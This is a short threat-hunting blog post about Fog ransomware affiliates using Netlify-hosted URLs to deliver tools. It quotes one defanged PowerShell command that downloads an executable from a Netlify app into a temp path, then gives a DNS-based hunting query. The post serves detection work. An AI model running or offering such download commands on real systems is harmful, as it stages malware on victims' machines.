335. Adversaries Abuse Netlify for Malware Delivery
Hello everyone!
Today we'll look at another example of Ingress Tool Transfer (T1105). And this time adversaries used Netlify to store malicious files.
According to the report, Fog ransomeware affiliates used PowerShell to download malicious files, for example:
iwr -uri 'hxxps://hilarious-trifle-d9182e.netlify[.]app/ktool.exe' -outfile $temppath
As you can see, they used Netlify, a legitimate platform for building, deploying, and scaling web apps, to store those files.
To tell the truth, it's not the first time I see adversaries use it, so it's another good target for hunting:
event_type: "dnsreqwin"
AND
dns_rname: "netlify.app"
See you tomorrow!

Comments
Post a Comment